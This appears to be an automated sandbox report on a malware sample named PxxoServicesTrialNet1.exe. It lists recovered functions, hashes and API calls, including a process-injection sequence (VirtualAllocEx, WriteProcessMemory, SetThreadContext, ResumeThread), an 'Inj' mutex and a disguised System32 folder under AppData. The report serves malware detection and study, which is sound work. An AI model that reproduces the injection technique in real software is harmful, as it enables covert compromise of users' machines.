                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4171a7721dc7ebaae27cabbc8940f16a1f6775cc03e8d72829ec79757c7156a
                                        • Instruction ID: 31bc5a7968735d7cbc33698e5f8b5f8c2417aeb34af42c70e63d9226c2becac1
                                        • Opcode Fuzzy Hash: d4171a7721dc7ebaae27cabbc8940f16a1f6775cc03e8d72829ec79757c7156a
                                        • Instruction Fuzzy Hash: 171101303056118FD72AAB29D8E496ABBEAFFC675530801B8E506CF360CF20DC01C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103FBF4, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0103FE36
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 25000d5e8ec920aeb50a58c7ef462729255f8fcf5a535c73b024eda13639c314
                                        • Instruction ID: 5f2d151a5ca956d34779f05fdd9e9de8690efb99a21ae386b3baf0f59de3ff69
                                        • Opcode Fuzzy Hash: 25000d5e8ec920aeb50a58c7ef462729255f8fcf5a535c73b024eda13639c314
                                        • Instruction Fuzzy Hash: 32A17C71D0021A8FDF10CF68C8457EDBBF6BF88314F1485A9E859A7240D7749985CF92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103FC00, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0103FE36
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 53cd91900ee9effdd22f040d3cdf55fb1ba8092932ec5e4a9134ea0ddd9f06f1
                                        • Instruction ID: 52dcbc17e368f4fd98bcb576f5c72914342276f4afde7bb57db64d8f116b6bcb
                                        • Opcode Fuzzy Hash: 53cd91900ee9effdd22f040d3cdf55fb1ba8092932ec5e4a9134ea0ddd9f06f1
                                        • Instruction Fuzzy Hash: 96916C71D0021A9FDF24DF68C8447EDBBF6BF88314F0485A9E859A7240DB749985CF92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05121240, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 05121299
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 82b2015d5e2014582e8deda964b2167505c58880af43694fb222e366c652a333
                                        • Instruction ID: 106e916b32bae4e2cb531ba8a0b683743162df03d07a42fddb748a7e07fec521
                                        • Opcode Fuzzy Hash: 82b2015d5e2014582e8deda964b2167505c58880af43694fb222e366c652a333
                                        • Instruction Fuzzy Hash: 8AA14A70E44219ABDB18DFA9D485BDCBBF2BF45354F188199D002BB390D774D8A5CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05121230, Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 05121299
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 6a8a238acd809c1b6b3c31e76b771e779a1ceffeb70c3fc26d4bf4152e8db5a0
                                        • Instruction ID: 02de2e302c9e148092ba678a28cc2c5483925daf78efc76f3d4dc68d29820812
                                        • Opcode Fuzzy Hash: 6a8a238acd809c1b6b3c31e76b771e779a1ceffeb70c3fc26d4bf4152e8db5a0
                                        • Instruction Fuzzy Hash: 53616870D00259EBDB18DFA9D488BDDBBF2BF89314F188559D002BB384C774A8A5CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103F370, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0103F408
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 6ff508d6e737d4d20f8faa3aeab7022592e30977997e2c9745f9355f9b5dffc2
                                        • Instruction ID: c225300cb2d5f72ebed664804262b30116eeba19e680245815a79143e1360386
                                        • Opcode Fuzzy Hash: 6ff508d6e737d4d20f8faa3aeab7022592e30977997e2c9745f9355f9b5dffc2
                                        • Instruction Fuzzy Hash: C92146B59003498FCF00CFA9C8847DEBBF5FF48314F04842AEA59A7640C7789944CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103F378, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0103F408
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 2961d42bad3a43d9bd3f6d544e6a4514c164ea44a89c09701c0ee2a87c1c9c7e
                                        • Instruction ID: 91a121e39999f4fc2903085f0e5cc6ee4524762bc85b1ce9b944fd7ef15101a3
                                        • Opcode Fuzzy Hash: 2961d42bad3a43d9bd3f6d544e6a4514c164ea44a89c09701c0ee2a87c1c9c7e
                                        • Instruction Fuzzy Hash: EF2127719003499FCF10CFA9C8847DEBBF5FF88314F00842AE959A7240C778A955CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103F660, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0103F6E8
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: c0f23dae7c17a026387e03efa0ba7df53186dabbee70922b96b52b177e63c145
                                        • Instruction ID: afa9c2f51236d2448c5b99faac42d53593ce98bd5f88fac1a343f47eba03b944
                                        • Opcode Fuzzy Hash: c0f23dae7c17a026387e03efa0ba7df53186dabbee70922b96b52b177e63c145
                                        • Instruction Fuzzy Hash: A6213671C003499FCB00CFA9C884BDEBBF5FF48320F10882AE959A7240C7799955CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103E3D0, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 0103E456
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: e35fb2cedc8cdb36d811779ef3bef54f681b04fa7bd24e5a6e596677d0d3a1ab
                                        • Instruction ID: c4c370f28cfb9168b2839588455b51bfe64a7e53473573168116d45e90e5d1c2
                                        • Opcode Fuzzy Hash: e35fb2cedc8cdb36d811779ef3bef54f681b04fa7bd24e5a6e596677d0d3a1ab
                                        • Instruction Fuzzy Hash: 502139719002088FDB10CFA9C4847EEBBF4EF89224F54C42AD959A7241DB78A945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103E3D8, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 0103E456
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: af40460504768d8e7258ef53cc2ef70f5b19bbf619877f5f533b73d1e61b39d9
                                        • Instruction ID: a308c9f5ad00bf8688e9baf7e46bb1c43d3810df1c457168f96d7731e60b2629
                                        • Opcode Fuzzy Hash: af40460504768d8e7258ef53cc2ef70f5b19bbf619877f5f533b73d1e61b39d9
                                        • Instruction Fuzzy Hash: C42138719002088FDB10CFAAC4847EEBBF4EF88224F54C42AD559A7240CB78A945CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103F668, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0103F6E8
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: a75f50b1764c7bfdfe4ebb398f18d67babed43b1fed9c5030c166f010e9d3879
                                        • Instruction ID: c52ac8e887396a12934872d9d011c8796bb89e1eeacc0eb1ada3adbbb0765bdd
                                        • Opcode Fuzzy Hash: a75f50b1764c7bfdfe4ebb398f18d67babed43b1fed9c5030c166f010e9d3879
                                        • Instruction Fuzzy Hash: 81212871D003499FCB10CFA9C8847DEBBF5FF48324F10842AE959A7250C7799945DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05121170, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 051211EE
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: KernelObjectSecurity
                                        • String ID:
                                        • API String ID: 3015937269-0
                                        • Opcode ID: de2da6be81ecbea60850566c1b87d31b5e11d90566c24ba5e76b74fcaf7af5ea
                                        • Instruction ID: 2775aea24081ade1ec53de82b21838080829d736e7568daa8a53192f1aebf035
                                        • Opcode Fuzzy Hash: de2da6be81ecbea60850566c1b87d31b5e11d90566c24ba5e76b74fcaf7af5ea
                                        • Instruction Fuzzy Hash: B1213BB19002599FCB10CFAAC484BDEBBF4FF88324F14842AE519A7340D778A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0512174B, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 051217C3
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 03edbb7c20d7326b2692474594134cb271f1394665ac905aa6b7ad18e405aafe
                                        • Instruction ID: aa15d0366bd9d84a56ccec76a6be5a442a920127de4e150d23e94be562f8b362
                                        • Opcode Fuzzy Hash: 03edbb7c20d7326b2692474594134cb271f1394665ac905aa6b7ad18e405aafe
                                        • Instruction Fuzzy Hash: B021C2B59002489FCB10DF9AC484BDEFBF4FB88324F14842AE569A7610D779A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05121750, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 051217C3
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: e69a829aeaa7266617ddd231df6b69f0084eda1c8b1a2f038860aafd4d960ec4
                                        • Instruction ID: 3ff45518b75a1b1f8801e3cdae4189bbbdc9692dc0cf8caebcc3b97aa3bdeaf2
                                        • Opcode Fuzzy Hash: e69a829aeaa7266617ddd231df6b69f0084eda1c8b1a2f038860aafd4d960ec4
                                        • Instruction Fuzzy Hash: DD11E4B59002489FCB10DF9AC484BDEFBF4FB88324F14842AE559A7710D775A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103F0B3, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0103F126
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: e01cb21c1814ae6546c09fdc349532a37c0984677fa8a97d53a35b3062ec8c40
                                        • Instruction ID: 57f01285d2cc2b4ccd098717152821f0a77f14eb488afaf7df40f0c1d593c0fd
                                        • Opcode Fuzzy Hash: e01cb21c1814ae6546c09fdc349532a37c0984677fa8a97d53a35b3062ec8c40
                                        • Instruction Fuzzy Hash: 391156729002099FCF10CFA9C8487DEBBF5EB88324F14881AE565A7250C779A944CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103F0B8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0103F126
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: f41f88e9c215c10bc4dfbeb99cd8c56671068a5b6ca80f6397dd47ea5030418d
                                        • Instruction ID: b88e27826830cef6bee19c642787284586ce3714cbbc600f8a9aaebd295770a3
                                        • Opcode Fuzzy Hash: f41f88e9c215c10bc4dfbeb99cd8c56671068a5b6ca80f6397dd47ea5030418d
                                        • Instruction Fuzzy Hash: 1D1167719002099FCF10CFA9C8447DFBBF5EF88324F14881AE565A7210C775A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103BC38, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0103CFAF
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 1e914f93ac7f16fb2249c410690cda092d27b78d2c87564a7f04577ac362d5c6
                                        • Instruction ID: cd4f16d30bd1da05d0fc568a0a34510da8576d70adec11c36bff161243f20ace
                                        • Opcode Fuzzy Hash: 1e914f93ac7f16fb2249c410690cda092d27b78d2c87564a7f04577ac362d5c6
                                        • Instruction Fuzzy Hash: 031158B18042098FDB10DF99C5487EEBBF4EB88324F14842AD559B7340D779A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0512023B, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 74dac57b041aeb114d03fd209d3af5493eb22ce9661453e0aa0dd7b82943a417
                                        • Instruction ID: c31f2af61ede957427acac083bb0e12adc5cc7bbb1ad659c22fc7be5b6712c83
                                        • Opcode Fuzzy Hash: 74dac57b041aeb114d03fd209d3af5493eb22ce9661453e0aa0dd7b82943a417
                                        • Instruction Fuzzy Hash: 871128B19042488BCB10DFAAC4487DEFBF4AB88224F14882AD569B7640C779A944CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05120240, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.764839909.0000000005120000.00000040.00000001.sdmp, Offset: 05120000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 411bd3a0105b64e5139be9a87429f9b46921cc06c91c89eb0dfdbec5ced2e1f8
                                        • Instruction ID: f1b0f27900469e91bdc1b34c1bfc90d92cd3124c00efe0cce2e92ec1c9951403
                                        • Opcode Fuzzy Hash: 411bd3a0105b64e5139be9a87429f9b46921cc06c91c89eb0dfdbec5ced2e1f8
                                        • Instruction Fuzzy Hash: 08113A719043488FCB10DFAAC4487DEFBF4AF88224F14842AD559B7640C779A944CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0103CF49, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0103CFAF
                                        Memory Dump Source
                                        • Source File: 00000018.00000002.747806998.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 03620d83c22ce4d6fdeb86cf6975b1225f701569313817556ae0ac5ba7c16404
                                        • Instruction ID: 1ec7499bb6980711ba460e9b0307731b958f1395bd0364a6373ead6577f36bdc
                                        • Opcode Fuzzy Hash: 03620d83c22ce4d6fdeb86cf6975b1225f701569313817556ae0ac5ba7c16404
                                        • Instruction Fuzzy Hash: A61125B28002098FDB10DF99C5897EEBBF4EF88324F15842AD569B7740D779A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Analysis Process: PxxoServicesTrialNet1.exe PID: 4480 Parent PID: 5772 PxxoServicesTrialNet1.exeCOMMON

                                        Executed Functions

                                        Function 00408C98, Relevance: 263.4, APIs: 134, Strings: 16, Instructions: 938synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                          • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                          • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                          • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                          • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                          • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                          • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                          • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                        • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                        • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                        • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                        • OpenMutexA.KERNEL32 ref: 00408E80
                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                        • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                          • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                          • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                          • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
